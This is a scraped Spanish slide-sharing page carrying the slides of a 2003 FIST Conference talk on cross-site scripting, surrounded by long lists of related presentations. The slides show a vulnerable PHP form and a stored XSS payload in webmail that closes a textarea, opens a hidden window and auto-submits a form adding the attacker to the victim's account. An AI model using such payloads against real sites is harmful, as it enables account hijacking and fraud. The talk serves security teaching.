Enviar búsqueda
Cargar
Exploiting Web Applications XSS
•
Descargar como PPT, PDF
•
0 recomendaciones
•
369 vistas
Conferencias FIST
Seguir
Tecnología
Denunciar
Compartir
Denunciar
Compartir
1 de 17
Descargar ahora
Recomendados
Que es xss
Que es xss
James Jara
Art hack web-v1-4
Art hack web-v1-4
esmartcrimt
Xss a fondo
Xss a fondo
Alan Resendiz
Xss con javascript
Xss con javascript
Alan Resendiz
Goncha
Goncha
joseph mendoza
Data Model & Singleton pattern
Data Model & Singleton pattern
ripoblet
10 Visión Por Computador
10 Visión Por Computador
Alcira Ordóñez Rey
RED NEURONAL ADALINE
RED NEURONAL ADALINE
ESCOM
Recomendados
Que es xss
Que es xss
James Jara
Art hack web-v1-4
Art hack web-v1-4
esmartcrimt
Xss a fondo
Xss a fondo
Alan Resendiz
Xss con javascript
Xss con javascript
Alan Resendiz
Goncha
Goncha
joseph mendoza
Data Model & Singleton pattern
Data Model & Singleton pattern
ripoblet
10 Visión Por Computador
10 Visión Por Computador
Alcira Ordóñez Rey
RED NEURONAL ADALINE
RED NEURONAL ADALINE
ESCOM
Exploiting Web applications SQL Injection
Exploiting Web applications SQL Injection
Conferencias FIST
Presentación Workshop php Barcelona Seguridad
Presentación Workshop php Barcelona Seguridad
guestbfa74a
Completo conferencia seguridad_web_software_libre_2015
Completo conferencia seguridad_web_software_libre_2015
Securinf.com Seguridad Informatica - Tecnoweb2.com
Seguridad en aplicaciones web
Seguridad en aplicaciones web
Jose Mato
XSS to the MAX - Juan Manuel Garcia (OWASP LATAM TOUR 2016)
XSS to the MAX - Juan Manuel Garcia (OWASP LATAM TOUR 2016)
kernelinux
Seguridad WEB - Principios básicos.
Seguridad WEB - Principios básicos.
Oscar Javier Gentilezza Arenas
Esquemas de seguridad para el servidor
Esquemas de seguridad para el servidor
Alberto Arredondo Infante
Codigos para html
Codigos para html
Guillermo Ce
Mitigando Eventualidades de Seguridad en Web 2.0 + Semántica
Mitigando Eventualidades de Seguridad en Web 2.0 + Semántica
Software Guru
Samm owasp
Samm owasp
Software Guru
Ataques a aplicaciones web
Ataques a aplicaciones web
Alan Resendiz
Encriptación parte 1
Encriptación parte 1
Mian Rosales
Seguridad en los sistemas web
Seguridad en los sistemas web
Facultad de Ciencias y Sistemas
Ejemnplos java nuevos
Ejemnplos java nuevos
Stiven Valencia Ramirez
Xss attacks
Xss attacks
Rober Garamo
Seguridad en Open Solaris
Seguridad en Open Solaris
Conferencias FIST
Seguridad en Entornos Web Open Source
Seguridad en Entornos Web Open Source
Conferencias FIST
Spanish Honeynet Project
Spanish Honeynet Project
Conferencias FIST
Seguridad en Windows Mobile
Seguridad en Windows Mobile
Conferencias FIST
SAP Security
SAP Security
Conferencias FIST
Que es Seguridad
Que es Seguridad
Conferencias FIST
Network Access Protection
Network Access Protection
Conferencias FIST
Más contenido relacionado
Similar a Exploiting Web Applications XSS
Exploiting Web applications SQL Injection
Exploiting Web applications SQL Injection
Conferencias FIST
Presentación Workshop php Barcelona Seguridad
Presentación Workshop php Barcelona Seguridad
guestbfa74a
Completo conferencia seguridad_web_software_libre_2015
Completo conferencia seguridad_web_software_libre_2015
Securinf.com Seguridad Informatica - Tecnoweb2.com
Seguridad en aplicaciones web
Seguridad en aplicaciones web
Jose Mato
XSS to the MAX - Juan Manuel Garcia (OWASP LATAM TOUR 2016)
XSS to the MAX - Juan Manuel Garcia (OWASP LATAM TOUR 2016)
kernelinux
Seguridad WEB - Principios básicos.
Seguridad WEB - Principios básicos.
Oscar Javier Gentilezza Arenas
Esquemas de seguridad para el servidor
Esquemas de seguridad para el servidor
Alberto Arredondo Infante
Codigos para html
Codigos para html
Guillermo Ce
Mitigando Eventualidades de Seguridad en Web 2.0 + Semántica
Mitigando Eventualidades de Seguridad en Web 2.0 + Semántica
Software Guru
Samm owasp
Samm owasp
Software Guru
Ataques a aplicaciones web
Ataques a aplicaciones web
Alan Resendiz
Encriptación parte 1
Encriptación parte 1
Mian Rosales
Seguridad en los sistemas web
Seguridad en los sistemas web
Facultad de Ciencias y Sistemas
Ejemnplos java nuevos
Ejemnplos java nuevos
Stiven Valencia Ramirez
Xss attacks
Xss attacks
Rober Garamo
Similar a Exploiting Web Applications XSS
(15)
Exploiting Web applications SQL Injection
Exploiting Web applications SQL Injection
Presentación Workshop php Barcelona Seguridad
Presentación Workshop php Barcelona Seguridad
Completo conferencia seguridad_web_software_libre_2015
Completo conferencia seguridad_web_software_libre_2015
Seguridad en aplicaciones web
Seguridad en aplicaciones web
XSS to the MAX - Juan Manuel Garcia (OWASP LATAM TOUR 2016)
XSS to the MAX - Juan Manuel Garcia (OWASP LATAM TOUR 2016)
Seguridad WEB - Principios básicos.
Seguridad WEB - Principios básicos.
Esquemas de seguridad para el servidor
Esquemas de seguridad para el servidor
Codigos para html
Codigos para html
Mitigando Eventualidades de Seguridad en Web 2.0 + Semántica
Mitigando Eventualidades de Seguridad en Web 2.0 + Semántica
Samm owasp
Samm owasp
Ataques a aplicaciones web
Ataques a aplicaciones web
Encriptación parte 1
Encriptación parte 1
Seguridad en los sistemas web
Seguridad en los sistemas web
Ejemnplos java nuevos
Ejemnplos java nuevos
Xss attacks
Xss attacks
Más de Conferencias FIST
Seguridad en Open Solaris
Seguridad en Open Solaris
Conferencias FIST
Seguridad en Entornos Web Open Source
Seguridad en Entornos Web Open Source
Conferencias FIST
Spanish Honeynet Project
Spanish Honeynet Project
Conferencias FIST
Seguridad en Windows Mobile
Seguridad en Windows Mobile
Conferencias FIST
SAP Security
SAP Security
Conferencias FIST
Que es Seguridad
Que es Seguridad
Conferencias FIST
Network Access Protection
Network Access Protection
Conferencias FIST
Las Evidencias Digitales en la Informática Forense
Las Evidencias Digitales en la Informática Forense
Conferencias FIST
Evolución y situación actual de la seguridad en redes WiFi
Evolución y situación actual de la seguridad en redes WiFi
Conferencias FIST
El Information Security Forum
El Information Security Forum
Conferencias FIST
Criptografia Cuántica
Criptografia Cuántica
Conferencias FIST
Inseguridad en Redes Wireless
Inseguridad en Redes Wireless
Conferencias FIST
Mas allá de la Concienciación
Mas allá de la Concienciación
Conferencias FIST
Security Metrics
Security Metrics
Conferencias FIST
PKI Interoperability
PKI Interoperability
Conferencias FIST
Wifislax 3.1
Wifislax 3.1
Conferencias FIST
Network Forensics
Network Forensics
Conferencias FIST
Riesgo y Vulnerabilidades en el Desarrollo
Riesgo y Vulnerabilidades en el Desarrollo
Conferencias FIST
Demostracion Hacking Honeypot y Análisis Forense
Demostracion Hacking Honeypot y Análisis Forense
Conferencias FIST
Security Maturity Model
Security Maturity Model
Conferencias FIST
Más de Conferencias FIST
(20)
Seguridad en Open Solaris
Seguridad en Open Solaris
Seguridad en Entornos Web Open Source
Seguridad en Entornos Web Open Source
Spanish Honeynet Project
Spanish Honeynet Project
Seguridad en Windows Mobile
Seguridad en Windows Mobile
SAP Security
SAP Security
Que es Seguridad
Que es Seguridad
Network Access Protection
Network Access Protection
Las Evidencias Digitales en la Informática Forense
Las Evidencias Digitales en la Informática Forense
Evolución y situación actual de la seguridad en redes WiFi
Evolución y situación actual de la seguridad en redes WiFi
El Information Security Forum
El Information Security Forum
Criptografia Cuántica
Criptografia Cuántica
Inseguridad en Redes Wireless
Inseguridad en Redes Wireless
Mas allá de la Concienciación
Mas allá de la Concienciación
Security Metrics
Security Metrics
PKI Interoperability
PKI Interoperability
Wifislax 3.1
Wifislax 3.1
Network Forensics
Network Forensics
Riesgo y Vulnerabilidades en el Desarrollo
Riesgo y Vulnerabilidades en el Desarrollo
Demostracion Hacking Honeypot y Análisis Forense
Demostracion Hacking Honeypot y Análisis Forense
Security Maturity Model
Security Maturity Model
Último
ATAJOS DE WINDOWS. Los diferentes atajos para utilizar en windows y ser más e...
ATAJOS DE WINDOWS. Los diferentes atajos para utilizar en windows y ser más e...
FacuMeza2
trabajotecologiaisabella-240424003133-8f126965.pdf
trabajotecologiaisabella-240424003133-8f126965.pdf
IsabellaMontaomurill
Mapa-conceptual-del-Origen-del-Universo-3.pptx
Mapa-conceptual-del-Origen-del-Universo-3.pptx
MidwarHenryLOZAFLORE
El uso delas tic en la vida cotidiana MFEL
El uso delas tic en la vida cotidiana MFEL
maryfer27m
tics en la vida cotidiana prepa en linea modulo 1.pptx
tics en la vida cotidiana prepa en linea modulo 1.pptx
azmysanros90
PARTES DE UN OSCILOSCOPIO ANALOGICO .pdf
PARTES DE UN OSCILOSCOPIO ANALOGICO .pdf
SergioMendoza354770
Actividad integradora 6 CREAR UN RECURSO MULTIMEDIA
Actividad integradora 6 CREAR UN RECURSO MULTIMEDIA
241531640
El uso de las TIC's en la vida cotidiana.
El uso de las TIC's en la vida cotidiana.
241514949
Crear un recurso multimedia. Maricela_Ponce_DomingoM1S3AI6-1.pptx
Crear un recurso multimedia. Maricela_Ponce_DomingoM1S3AI6-1.pptx
Nombre Apellidos
El uso de las tic en la vida ,lo importante que son
El uso de las tic en la vida ,lo importante que son
241514984
GonzalezGonzalez_Karina_M1S3AI6... .pptx
GonzalezGonzalez_Karina_M1S3AI6... .pptx
241523733
Medidas de formas, coeficiente de asimetría y coeficiente de curtosis.pptx
Medidas de formas, coeficiente de asimetría y coeficiente de curtosis.pptx
aylincamaho
La era de la educación digital y sus desafios
La era de la educación digital y sus desafios
Fundación YOD YOD
R1600G CAT Variables de cargadores en mina
R1600G CAT Variables de cargadores en mina
arkananubis
Arenas Camacho-Practica tarea Sesión 12.pptx
Arenas Camacho-Practica tarea Sesión 12.pptx
JOSEFERNANDOARENASCA
dokumen.tips_36274588-sistema-heui-eui.ppt
dokumen.tips_36274588-sistema-heui-eui.ppt
MiguelAtencio10
Presentación inteligencia artificial en la actualidad
Presentación inteligencia artificial en la actualidad
MiguelAngelVillanuev48
FloresMorales_Montserrath_M1S3AI6 (1).pptx
FloresMorales_Montserrath_M1S3AI6 (1).pptx
241522327
Plan de aula informatica segundo periodo.docx
Plan de aula informatica segundo periodo.docx
pabonheidy28
definicion segun autores de matemáticas educativa
definicion segun autores de matemáticas educativa
AdrianaMartnez618894
Último
(20)
ATAJOS DE WINDOWS. Los diferentes atajos para utilizar en windows y ser más e...
ATAJOS DE WINDOWS. Los diferentes atajos para utilizar en windows y ser más e...
trabajotecologiaisabella-240424003133-8f126965.pdf
trabajotecologiaisabella-240424003133-8f126965.pdf
Mapa-conceptual-del-Origen-del-Universo-3.pptx
Mapa-conceptual-del-Origen-del-Universo-3.pptx
El uso delas tic en la vida cotidiana MFEL
El uso delas tic en la vida cotidiana MFEL
tics en la vida cotidiana prepa en linea modulo 1.pptx
tics en la vida cotidiana prepa en linea modulo 1.pptx
PARTES DE UN OSCILOSCOPIO ANALOGICO .pdf
PARTES DE UN OSCILOSCOPIO ANALOGICO .pdf
Actividad integradora 6 CREAR UN RECURSO MULTIMEDIA
Actividad integradora 6 CREAR UN RECURSO MULTIMEDIA
El uso de las TIC's en la vida cotidiana.
El uso de las TIC's en la vida cotidiana.
Crear un recurso multimedia. Maricela_Ponce_DomingoM1S3AI6-1.pptx
Crear un recurso multimedia. Maricela_Ponce_DomingoM1S3AI6-1.pptx
El uso de las tic en la vida ,lo importante que son
El uso de las tic en la vida ,lo importante que son
GonzalezGonzalez_Karina_M1S3AI6... .pptx
GonzalezGonzalez_Karina_M1S3AI6... .pptx
Medidas de formas, coeficiente de asimetría y coeficiente de curtosis.pptx
Medidas de formas, coeficiente de asimetría y coeficiente de curtosis.pptx
La era de la educación digital y sus desafios
La era de la educación digital y sus desafios
R1600G CAT Variables de cargadores en mina
R1600G CAT Variables de cargadores en mina
Arenas Camacho-Practica tarea Sesión 12.pptx
Arenas Camacho-Practica tarea Sesión 12.pptx
dokumen.tips_36274588-sistema-heui-eui.ppt
dokumen.tips_36274588-sistema-heui-eui.ppt
Presentación inteligencia artificial en la actualidad
Presentación inteligencia artificial en la actualidad
FloresMorales_Montserrath_M1S3AI6 (1).pptx
FloresMorales_Montserrath_M1S3AI6 (1).pptx
Plan de aula informatica segundo periodo.docx
Plan de aula informatica segundo periodo.docx
definicion segun autores de matemáticas educativa
definicion segun autores de matemáticas educativa
Exploiting Web Applications XSS
1.
FIST Conference October
2003 @ Cross-site scripting © Rafael San Miguel Carrasco
2.
XSS
Portal exclusivo para clientes de SMC: webmail grupos de usuarios (1 cuenta, múltiples usuarios) compra de entradas, discos, libros, videojuegos, etc. © Rafael San Miguel Carrasco, rsmc@soluciones-seguras.com 2
3.
XSS
Autenticación: Basada en login/password, al inicio de cada sesión. En adelante, una cookie que se utiliza como credencial para todos los recursos del portal. © Rafael San Miguel Carrasco, rsmc@soluciones-seguras.com 3
4.
XSS
2 vulnerabilidades: el webmail es vulnerable a XSS (al leer un mensaje con contenido malicioso) es posible automatizar el proceso de inclusión de un nuevo usuario a nuestra cuenta © Rafael San Miguel Carrasco, rsmc@soluciones-seguras.com 4
5.
XSS
Añadir a un usuario a mi lista: © Rafael San Miguel Carrasco, rsmc@soluciones-seguras.com 5
6.
XSS © Rafael San
Miguel Carrasco, rsmc@soluciones-seguras.com 6
7.
XSS © Rafael San
Miguel Carrasco, rsmc@soluciones-seguras.com 7
8.
XSS
HTML form en datosusuario.php: (qué se envía a confirma.php) echo "<form action=confirma.php method=post>"; echo "<p>Su nombre: <b>Rafael San Miguel Carrasco</b><br>"; echo "<input type=hidden name=nombre value=Rafael San Miguel>"; echo "Usuario que desea añadir: <b>$duser</b><br>"; echo "<input type=hidden name=nuevo value='$duser'>"; echo "Cuenta asociada a la línea: <b>91 466 56 89</b></p>"; echo "<input type=hidden name=linea value=91 466 56 89>"; <p>Limite de consumo: <select name="limite"> <option value="">Seleccione una cantidad <option value="100">100 euros <option value="200">200 euros <option value="500">500 euros <option value="0">Sin límite </select><p> © Rafael San Miguel Carrasco, rsmc@soluciones-seguras.com 8
9.
XSS
Utilizando form reloading: <form action=http://127.0.0.1/confirma.php method=post> <input type=hidden name=nombre value=Rafael San Miguel Carrasco> <input type=hidden name=nuevo value='Julia Villanueva'> <input type=hidden name=linea value=91 466 56 89> <input type=hidden name=limite value=0> <input type=submit value=enviar> </form> Luego es posible reducir los tres pasos de procedimiento original a un solo paso. © Rafael San Miguel Carrasco, rsmc@soluciones-seguras.com 9
10.
XSS
Comprobamos que es vulnerable a XSS: © Rafael San Miguel Carrasco, rsmc@soluciones-seguras.com 10
11.
XSS
Inicialmente, parece que no: © Rafael San Miguel Carrasco, rsmc@soluciones-seguras.com 11
12.
XSS
Cerramos </textarea>, ahora sí: © Rafael San Miguel Carrasco, rsmc@soluciones-seguras.com 12
13.
XSS
Insertamos el form anterior, con algunos cambios: el código se carga en otra ventana el envío del formulario es automático se intenta ocultar la ventana (dimensión mínima, localización más alla de los límites de la pantalla © Rafael San Miguel Carrasco, rsmc@soluciones-seguras.com 13
14.
XSS
Por lo tanto: 1. El usuario víctima recibe el e-mail 2. Al abrirlo, se ejecuta el código del formulario en otra ventana, sin que éste lo advierta 3. El envío del formulario supone mi inclusión en la lista de usuarios de la víctima © Rafael San Miguel Carrasco, rsmc@soluciones-seguras.com 14
15.
XSS
Éste es el formulario modificado: </textarea><script>v = window.open (<parametros de localizacion y tamaño>); v.document.write ('<body><form name=f action=http://127.0.0.1/confirma.php method=post>'); v.document.write ('<input type=hidden name=nombre value=víctima>'); v.document.write ('<input type=hidden name=nuevo value=nuestro nombre>'); v.document.write ('<input type=hidden name=linea value=teléfono de la víctima>'); v.document.write ('<input type=hidden name=limite value=0>'); v.document.write ('<img src=bla.jpg onError=document.f.submit ()></form> </body>'); v.close (); </script> © Rafael San Miguel Carrasco, rsmc@soluciones-seguras.com 15
16.
Herramientas de detección
de vulnerabilidades <script> function openBrWindow(theURL,winName,features) { window.open(theURL,winName,features); } </script> <a href="#" onClick="openBrWindow('bla.html','','');"> <img src="bla.jpg"></a> © Rafael San Miguel Carrasco, rsmc@soluciones-seguras.com 16
17.
Cross-site scripting FIST Conference
October 2003 © Rafael San Miguel Carrasco Madrid, 25 October 2003
Notas del editor
Para la mayor parte de las organizaciones los activos se dividen entre críticos y no críticos.
Para la mayor parte de las organizaciones los activos se dividen entre críticos y no críticos.
Para la mayor parte de las organizaciones los activos se dividen entre críticos y no críticos.
Para la mayor parte de las organizaciones los activos se dividen entre críticos y no críticos.
Para la mayor parte de las organizaciones los activos se dividen entre críticos y no críticos.
Para la mayor parte de las organizaciones los activos se dividen entre críticos y no críticos.
Para la mayor parte de las organizaciones los activos se dividen entre críticos y no críticos.
Para la mayor parte de las organizaciones los activos se dividen entre críticos y no críticos.
Para la mayor parte de las organizaciones los activos se dividen entre críticos y no críticos.
Para la mayor parte de las organizaciones los activos se dividen entre críticos y no críticos.
Para la mayor parte de las organizaciones los activos se dividen entre críticos y no críticos.
Para la mayor parte de las organizaciones los activos se dividen entre críticos y no críticos.
Para la mayor parte de las organizaciones los activos se dividen entre críticos y no críticos.
Descargar ahora